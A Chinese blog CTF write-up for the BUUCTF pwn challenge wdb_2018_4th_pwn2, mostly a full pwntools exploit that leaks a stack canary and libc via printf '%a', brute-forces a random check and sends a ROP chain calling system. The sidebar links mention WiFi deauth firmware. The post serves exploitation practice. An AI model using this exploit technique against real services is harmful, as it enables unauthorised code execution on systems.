[BUUCTF-pwn] wdb_2018_4th_pwn2

最新推荐文章于 2023-04-03 00:38:30 发布
最新推荐文章于 2023-04-03 00:38:30 发布
阅读量251 收藏
点赞数
分类专栏: CTF pwn 文章标签: c语言 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/121456310
版权

printf('%a')  

程序有4个函数:

  1. 在栈内写,可溢出,但由于有canary不通直接写ROP,且只能运行1次
  2. 在bss写,可以递归式调用
  3. 可以运行printf(input ,1) 这里input只能2字节
  4. 把门把bss写入栈内溢出,但要求输入与随机数相等,,并且关闭输入,无法交互

 要点:

  1. printf('%a',1)浮点格式可以带出libc
  2. 8位随机数,会有0的时候,而且从事实上看1000次以内就能成功

步骤:

  1. 先调用2多次,因为递归调用会在栈内多次布放canary,这些失效的canary在调整好payload长度时被带出
  2. 用%a 取得libc
  3. 由于爆破成功后会关闭输入,所以直接调用system(cat flag)
from pwn import *

'''
patchelf --set-interpreter /home/shi/pwn/libc6_2.23/ld-2.23.so pwn
patchelf --add-needed /home/shi/pwn/libc6_2.23/libc-2.23.so pwn
'''

local = 0
if local == 1:
    p = process('./pwn')
    libc_elf = ELF("/home/shi/pwn/libc6_2.23/libc-2.23.so")
    one = [0x45226, 0x4527a, 0xf0364, 0xf1207 ]
    libc_start_main_ret = 0x20840
else:
    p = remote('node4.buuoj.cn', 26292) 
    libc_elf = ELF('../libc6_2.23-0ubuntu10_amd64.so')
    one = [0x45216, 0x4526a, 0xf02a4, 0xf1147 ]
    libc_start_main_ret = 0x20830

elf = ELF('./pwn')
context(arch = 'amd64')

menu = b"option:"
def get_stack(msg):
    p.sendlineafter(menu, b'1')
    p.sendafter(b"once..\n", msg)
    p.recvuntil(msg)
    canary = b'\x00' + p.recv(7)
    return canary

def copy_canary(msg=b'A',n=0):
    p.sendlineafter(menu, b'2')
    for i in range(n):
        p.sendlineafter(b"bored...", b'A')
        p.sendlineafter(b"Satisfied?y/n\n", b'n')
    p.sendlineafter(b"bored...", msg)
    p.sendlineafter(b"Satisfied?y/n\n", b'y')

def get9011():
    p.sendlineafter(menu, b'9011')
    p.sendafter(b"Input your secret code:", b'\x00'*8)

#get canary
copy_canary(n=5)
payload = b'A'*0xa9
canary = get_stack(payload)
print(hex(u64(canary)))

#get libc
#0x0.07ffff7dd26a3p-1022Guess your option:haha
#gdb-peda$ x/20gx 0x7ffff7dd26a3
#0x7ffff7dd26a3 <_IO_2_1_stdout_+131>:	0xdd3780000000000a	0xffffff00007ffff7
p.sendlineafter(menu, b'3')
p.sendafter(b"think?)\n", b'%a')
p.recvuntil(b'0x0.0')
libc_base = int(p.recvuntil(b'p-', drop=True), 16) - libc_elf.sym['_IO_2_1_stdout_'] -131
system = libc_base + libc_elf.sym['system']
bin_sh = libc_base + next(libc_elf.search(b'/bin/sh'))
print('libc:', hex(libc_base))

#write rop 0x602080
pop_rdi = 0x0000000000400c53 # pop rdi ; ret
bss     = 0x602080
payload = b'cat flag' + canary + flat(0, pop_rdi, bss, system)
copy_canary(msg=payload)

for i in range(9999):
    get9011()
    if p.recv(2, timeout=0.1) != b'Am':
        print('.', end='')
        continue
    p.recv()
    p.interactive()

石氏是时试
关注
专栏目录
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTF Basic Linux Labs
Y1da的博客
09-13 530
BUUCTF Basic Linux Labs wp
关于vulnhub的高版本Ubantu靶机连不上内网的问题
二狗的博客
12-15 269
这个问题想解决很久了,经常会出现在vulnhub上下载的ova靶机装载在vmware上然后nmap/netdiscover找不到他的情况,而这种情况往往发生在ubantu机器上,今天就来好好查一查资料解决这个问题。
BUUCTF-Linux Labs
duanhwonline的专栏
04-03 555
【代码】BUUCTF-Linux Labs。
buuctf N种方法解决
weixin_53955759的博客
06-08 571
下载附件得到一个exe
BUUCTF Linux Labs
李二胖的博客
10-11 2044
首先启动靶机,如上图所示,可以获得登录链接和端口号 使用ssh root@node4.buuoj.cn 26740可以登录靶机,后续结果操作如下图获得flag.txt打印输出获得结果
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
wdb_2018_4th_pwn2(爆破随机数为0)
seaaseesa的博客
07-24 696
wdb_2018_4th_pwn2(爆破随机数为0) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,功能1栈溢出,但是有canary 功能3格式化字符串,当仅能泄露一个值。 功能2是一个递归调用,多次递归,可以在栈里多处位置留下canary的值 功能9011也是一个栈溢出,但是需要正确的key才能进行。 可以使用功能3泄露libc地址,然后功能2递归多次,再使用功能1将canary的值泄露,最后通过爆破随机数,用9011功能来进行栈溢出做ROP。 随机数可以直接
BUUCTF [RoarCTF 2019] Easy Calc
Senimo
03-29 764
BUUCTF [RoarCTF 2019] Easy Calc Web writeup 启动靶机,打开页面: 一个简单的计算器页面,查看网页源码: 提示设置了WAF以确保安全,尝试访问calc.php: 得到了WAF源码,分析代码: 需要传入变量num的值 设置了一系列黑名单的值 如果传入的变量num中有黑名单包括的符号,将终止程序 否则将输出num的内容 根据PHP的解析规则:如果变量...
BUUCTF|PWN-rip-WP
l2645470582_的博客
07-28 1107
1、下载文件并开启靶机 2、查看文件信息 checksec pwn1 3、我们看到该文件是64位的文件,用64位IDA打开该文件 3.1、shift+f12查看关键字符串 3.2、双击关键字符串,进入反编译代码区 3.3、利用Linux gdb查找fun()的位置信息 gdb pwn1 $:b fun 双击s查看范围地址 3.4。我们要覆盖s的内容到r返回地址,所以0xf+0x8 4、编译代码 from pwn impo...
buu内网靶机部署
pop364的博客
05-12 1458
basic题目下发实例 只需要xshell(不用frp) ssh (端口22) 用户名:root 密码:123456 连接主机node3.buuoj.cn 端口下发的实例端口27058(随机) ifconfig查内网ip174.1.64.147 /var/www/html 默认开了apache
[冀信2021-pwn] pwn19
weixin_52640415的博客
12-15 2606
这是一个简单的printf+溢出题,可以输入2次6位的串用来printf,然后输入串溢出。 int __cdecl main(int argc, const char **argv, const char **envp) { int v5; // [rsp+Ch] [rbp-34h] __int64 buf[5]; // [rsp+10h] [rbp-30h] BYREF unsigned __int64 v7; // [rsp+38h] [rbp-8h] v7 = __readfsq
BUUCTFpwn题解(一些栈题+程序分析)
热门推荐
swedsn
01-13 1万+
文章目录前言一、test_your_nc二、rip2.读入数据总结 前言 萌新的总结(包含当时做题的全过程),方便以后查看。有什么不对的望各位大佬指点。 一、test_your_nc 1.直接nc(nc+的ip+端口号)。这里是直接进入了对方的shell命令中(有些题目是直接进入对方的文件并不会进入对方的shell中)。接下来就是和操作自己的shell一样的,ls查看目录,cat查看文件flag。 相互连接 二、rip 1使用IDA打开文件,先找main函数,然后按F5查看伪代码。看wp说fun可疑,点进
buuctf pwn [rip] [warmup_csaw_2016 1] [ciscn_2019_n_1 1]
m0_62142241的博客
02-27 478
栈溢出 【以下这几题全是利用栈溢出来进行攻破】 相同步骤: 1.下载文件 2.启动靶机 3.打开Terminal(用nc打开端口,用ls打开目录及文件) 【nc的参数用法 -d 后台模式 -e prog 程序重定向,一旦连接,就执行 [危险!!] -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, … -h 帮助信息 -i secs 延时的间隔 -l 监听模式,用于入站连接 -L 连
[BUUCTF-pwn] wdb_2018_final_pwn3
weixin_52640415的博客
12-16 398
一个栈溢出的题,没开PIE 程序先打开随机数发生器,读入然后加密,与输入的对比,不同时可输入0x400数据(溢出)相同则跳出循环。 fd = open("/dev/urandom", 0); while ( 1 ) { puts("\nFind a MD5 hash collision!"); printf("target: "); read(fd, buf, 0x3FFuLL); crypto(buf, 0x64uLL, (__int64)s2);
buuctf--pwn小结1test_your_nc
Xor0ne
06-14 2267
参考链接: 1、BUUCTF刷题(持续更新) 2、BUUCTF-PWN刷题日记 0x01 test_your_nc 参考链接:https://blog.csdn.net/qq_42404383/article/details/103625124 (1)、思路:看名字,然后直接用nc nc的全名是netcat,其主要用途是建立和监听任意TCP和UDP连接,支持ipv4和ipv6。因此,它可以用来网络调试、端口扫描等等。 nc [-hlnruz][-g<网关...>][-G<指向器数目&
mqtt-pwn安装
最新发布
09-20
2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值